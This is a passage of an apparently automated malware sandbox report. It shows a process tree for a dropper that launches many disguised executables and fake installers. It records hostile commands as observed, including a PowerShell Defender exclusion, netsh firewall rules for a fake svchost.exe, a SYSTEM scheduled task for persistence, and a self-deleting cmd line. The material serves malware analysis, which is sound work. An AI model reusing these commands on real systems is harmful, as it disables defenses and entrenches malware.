                                                                                                      PID:3336
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\xw1Jy4W22SyUgo5y4GA2mq8i.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\xw1Jy4W22SyUgo5y4GA2mq8i.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:1364
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\8gDXObUDzZGsp3IMwp4YvGSl.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\8gDXObUDzZGsp3IMwp4YvGSl.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Drops file in Program Files directory
                                                                                                      PID:952
                                                                                                      • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                                                                                                        "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:908
                                                                                                      • C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe
                                                                                                        "C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:1056
                                                                                                      • C:\Program Files (x86)\Company\NewProduct\inst3.exe
                                                                                                        "C:\Program Files (x86)\Company\NewProduct\inst3.exe"
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:1792
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\jhjgj3QBV0AMtAWHnzRZTVjq.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\jhjgj3QBV0AMtAWHnzRZTVjq.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:2252
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\pm3mjK3d1RMTCKrWZ86a7PtK.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\pm3mjK3d1RMTCKrWZ86a7PtK.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Checks whether UAC is enabled
                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                      PID:1716
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\y8wQmaZ6Bs3I3nt4ANfC_0dN.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\y8wQmaZ6Bs3I3nt4ANfC_0dN.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1688
                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\y8wQmaZ6Bs3I3nt4ANfC_0dN.exe
                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\y8wQmaZ6Bs3I3nt4ANfC_0dN.exe"
                                                                                                        3⤵
                                                                                                          PID:5972
                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\sOAadv2hr6zrBPUikICiGAzZ.exe
                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\sOAadv2hr6zrBPUikICiGAzZ.exe"
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:1832
                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\sOAadv2hr6zrBPUikICiGAzZ.exe
                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\sOAadv2hr6zrBPUikICiGAzZ.exe"
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:3688
                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\Cf42ukR_Q1xxROjmGaZeu64J.exe
                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\Cf42ukR_Q1xxROjmGaZeu64J.exe"
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:3420
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3420 -s 656
                                                                                                          3⤵
                                                                                                          • Program crash
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:1812
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3420 -s 672
                                                                                                          3⤵
                                                                                                          • Program crash
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:4188
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3420 -s 740
                                                                                                          3⤵
                                                                                                          • Program crash
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:4844
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3420 -s 724
                                                                                                          3⤵
                                                                                                          • Program crash
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:4504
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3420 -s 1132
                                                                                                          3⤵
                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                          • Program crash
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:3364
                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\ocwvtUpS0Z10nx856h5nJ3QK.exe
                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\ocwvtUpS0Z10nx856h5nJ3QK.exe"
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Checks BIOS information in registry
                                                                                                        • Checks whether UAC is enabled
                                                                                                        • Drops file in Windows directory
                                                                                                        PID:1444
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                          3⤵
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:824
                                                                                                        • C:\Windows\System32\netsh.exe
                                                                                                          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                          3⤵
                                                                                                            PID:520
                                                                                                          • C:\Windows\System32\netsh.exe
                                                                                                            "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                            3⤵
                                                                                                              PID:4640
                                                                                                            • C:\Windows\System\svchost.exe
                                                                                                              "C:\Windows\System\svchost.exe" formal
                                                                                                              3⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Checks BIOS information in registry
                                                                                                              • Checks whether UAC is enabled
                                                                                                              • Drops file in Windows directory
                                                                                                              PID:5520
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                                4⤵
                                                                                                                  PID:6984
                                                                                                                • C:\Windows\System32\netsh.exe
                                                                                                                  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                  4⤵
                                                                                                                    PID:6340
                                                                                                                  • C:\Windows\System32\netsh.exe
                                                                                                                    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                    4⤵
                                                                                                                      PID:3440
                                                                                                                  • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                    schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                                                                                    3⤵
                                                                                                                    • Creates scheduled task(s)
                                                                                                                    PID:5416
                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\4AX7ohknyalfx95p47XzR9SD.exe
                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\4AX7ohknyalfx95p47XzR9SD.exe"
                                                                                                                  2⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Checks BIOS information in registry
                                                                                                                  • Checks whether UAC is enabled
                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                  PID:2148
                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\dbZTYHO47DMJ6JLjp3TkGavq.exe
                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\dbZTYHO47DMJ6JLjp3TkGavq.exe"
                                                                                                                  2⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                  PID:4320
                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\dbZTYHO47DMJ6JLjp3TkGavq.exe
                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\dbZTYHO47DMJ6JLjp3TkGavq.exe"
                                                                                                                    3⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:5044
                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\S04VPAnL1aYLSLFTPAUd_fRY.exe
                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\S04VPAnL1aYLSLFTPAUd_fRY.exe"
                                                                                                                  2⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:4392
                                                                                                                  • C:\Users\Admin\AppData\Roaming\3018160.exe
                                                                                                                    "C:\Users\Admin\AppData\Roaming\3018160.exe"
                                                                                                                    3⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:4412
                                                                                                                  • C:\Users\Admin\AppData\Roaming\3743469.exe
                                                                                                                    "C:\Users\Admin\AppData\Roaming\3743469.exe"
                                                                                                                    3⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:4600
                                                                                                                  • C:\Users\Admin\AppData\Roaming\3998957.exe
                                                                                                                    "C:\Users\Admin\AppData\Roaming\3998957.exe"
                                                                                                                    3⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Checks BIOS information in registry
                                                                                                                    • Checks whether UAC is enabled
                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                    PID:5668
                                                                                                                  • C:\Users\Admin\AppData\Roaming\8078019.exe
                                                                                                                    "C:\Users\Admin\AppData\Roaming\8078019.exe"
                                                                                                                    3⤵
                                                                                                                      PID:5404
                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                        4⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:2308
                                                                                                                    • C:\Users\Admin\AppData\Roaming\6293623.exe
                                                                                                                      "C:\Users\Admin\AppData\Roaming\6293623.exe"
                                                                                                                      3⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:5588
                                                                                                                    • C:\Users\Admin\AppData\Roaming\2783498.exe
                                                                                                                      "C:\Users\Admin\AppData\Roaming\2783498.exe"
                                                                                                                      3⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Checks whether UAC is enabled
                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                      PID:924
                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\8A_szTOpS6jTWIShbsMC5wCa.exe
                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\8A_szTOpS6jTWIShbsMC5wCa.exe"
                                                                                                                    2⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:4380
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-Q87P3.tmp\8A_szTOpS6jTWIShbsMC5wCa.tmp
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-Q87P3.tmp\8A_szTOpS6jTWIShbsMC5wCa.tmp" /SL5="$50120,506127,422400,C:\Users\Admin\Pictures\Adobe Films\8A_szTOpS6jTWIShbsMC5wCa.exe"
                                                                                                                      3⤵
                                                                                                                        PID:4616
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-5AE45.tmp\DYbALA.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-5AE45.tmp\DYbALA.exe" /S /UID=2710
                                                                                                                          4⤵
                                                                                                                          • Drops file in Drivers directory
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Adds Run key to start application
                                                                                                                          • Drops file in Program Files directory
                                                                                                                          PID:4156
                                                                                                                          • C:\Program Files\Windows Mail\BSSKFSWEPS\foldershare.exe
                                                                                                                            "C:\Program Files\Windows Mail\BSSKFSWEPS\foldershare.exe" /VERYSILENT
                                                                                                                            5⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:2544
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\dd-f2af2-104-64193-bbc21f10d1809\Ciwaebehesho.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\dd-f2af2-104-64193-bbc21f10d1809\Ciwaebehesho.exe"
                                                                                                                            5⤵
                                                                                                                            • Checks computer location settings
                                                                                                                            PID:4408
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\17-e4b6c-1d4-2b79c-516714209cefd\Jamozhehaqae.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\17-e4b6c-1d4-2b79c-516714209cefd\Jamozhehaqae.exe"
                                                                                                                            5⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Adds Run key to start application
                                                                                                                            PID:5404
                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\k4puq44l.e5t\GcleanerEU.exe /eufive & exit
                                                                                                                              6⤵
                                                                                                                                PID:3168
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\k4puq44l.e5t\GcleanerEU.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\k4puq44l.e5t\GcleanerEU.exe /eufive
                                                                                                                                  7⤵
                                                                                                                                    PID:5032
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xqw42lvv.0su\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                  6⤵
                                                                                                                                    PID:4836
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\xqw42lvv.0su\installer.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\xqw42lvv.0su\installer.exe /qn CAMPAIGN="654"
                                                                                                                                      7⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Enumerates connected drives
                                                                                                                                      • Modifies system certificate store
                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                      PID:3856
                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vgvymgga.af2\any.exe & exit
                                                                                                                                    6⤵
                                                                                                                                      PID:6860
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\vgvymgga.af2\any.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\vgvymgga.af2\any.exe
                                                                                                                                        7⤵
                                                                                                                                          PID:4800
                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gaqksazd.mzb\gcleaner.exe /mixfive & exit
                                                                                                                                        6⤵
                                                                                                                                          PID:6504
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\gaqksazd.mzb\gcleaner.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\gaqksazd.mzb\gcleaner.exe /mixfive
                                                                                                                                            7⤵
                                                                                                                                              PID:6436
                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j3t2gnum.xeh\autosubplayer.exe /S & exit
                                                                                                                                            6⤵
                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Checks computer location settings
                                                                                                                                            PID:388
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\j3t2gnum.xeh\autosubplayer.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\j3t2gnum.xeh\autosubplayer.exe /S
                                                                                                                                              7⤵
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                              PID:1512
                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy209C.tmp\tempfile.ps1"
                                                                                                                                                8⤵
                                                                                                                                                  PID:7520
                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\TGMQS3kNc8l_k6q6iB9nNBSv.exe
                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\TGMQS3kNc8l_k6q6iB9nNBSv.exe"
                                                                                                                                      2⤵
                                                                                                                                        PID:4600
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                          3⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:4884
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe"
                                                                                                                                            4⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:5200
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"
                                                                                                                                            4⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:5296
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                            4⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:5360
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-C24OA.tmp\setup.tmp
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-C24OA.tmp\setup.tmp" /SL5="$202C2,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                              5⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              PID:5544
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
                                                                                                                                                6⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:5908
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-H8U25.tmp\setup.tmp
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-H8U25.tmp\setup.tmp" /SL5="$302D0,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
                                                                                                                                                  7⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                  PID:6116
                                                                                                                                                  • C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe
                                                                                                                                                    "C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss1
                                                                                                                                                    8⤵
                                                                                                                                                      PID:6464
                                                                                                                                                    • C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe
                                                                                                                                                      "C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart
                                                                                                                                                      8⤵
                                                                                                                                                        PID:6500
                                                                                                                                                        • C:\5f6910c8fc320af2d3e3705906ba3997\Setup.exe
                                                                                                                                                          C:\5f6910c8fc320af2d3e3705906ba3997\\Setup.exe /q /norestart /x86 /x64 /web
                                                                                                                                                          9⤵
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                          PID:6816
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-P0M48.tmp\postback.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-P0M48.tmp\postback.exe" ss1
                                                                                                                                                        8⤵
                                                                                                                                                          PID:6456
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\askinstall60.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\askinstall60.exe"
                                                                                                                                                  4⤵
                                                                                                                                                    PID:5720
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\inst2.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\inst2.exe"
                                                                                                                                                    4⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:5484
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\6.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\6.exe"
                                                                                                                                                    4⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:5872
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                      5⤵
                                                                                                                                                        PID:7052
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                          6⤵
                                                                                                                                                            PID:928
                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                              ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                              7⤵
                                                                                                                                                              • Runs ping.exe
                                                                                                                                                              PID:6356
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\customer7.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\customer7.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:6136
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:5396
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5396 -s 664
                                                                                                                                                          5⤵
                                                                                                                                                          • Program crash
                                                                                                                                                          PID:6084
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5396 -s 692
                                                                                                                                                          5⤵
                                                                                                                                                          • Program crash
                                                                                                                                                          PID:6072
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5396 -s 716
                                                                                                                                                          5⤵
                                                                                                                                                          • Program crash
                                                                                                                                                          PID:4488
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5396 -s 736
                                                                                                                                                          5⤵
                                                                                                                                                          • Program crash
                                                                                                                                                          PID:6248
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5396 -s 768
                                                                                                                                                          5⤵
                                                                                                                                                          • Program crash
                                                                                                                                                          PID:6372
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5396 -s 892
                                                                                                                                                          5⤵
                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                          • Program crash
                                                                                                                                                          PID:5948
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\sfx.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\sfx.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:5344
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:5780
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        PID:5964
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                                          C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                                          5⤵
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                          PID:1544
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"
                                                                                                                                                            6⤵
                                                                                                                                                            • Checks computer location settings
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                            PID:6220
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                              C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1b8,0x1e8,0x7fff8bc2dec0,0x7fff8bc2ded0,0x7fff8bc2dee0
                                                                                                                                                              7⤵
                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                              PID:6908
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1808,11254222021613001556,12649311607691002777,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6220_1980082814" --mojo-platform-channel-handle=1884 /prefetch:8
                                                                                                                                                              7⤵
                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                              PID:5468
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1808,11254222021613001556,12649311607691002777,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6220_1980082814" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2660 /prefetch:1
                                                                                                                                                              7⤵
                                                                                                                                                              • Checks computer location settings
                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                              PID:6328
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1808,11254222021613001556,12649311607691002777,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6220_1980082814" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2580 /prefetch:1
                                                                                                                                                              7⤵
                                                                                                                                                              • Checks computer location settings
                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                              PID:4784
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
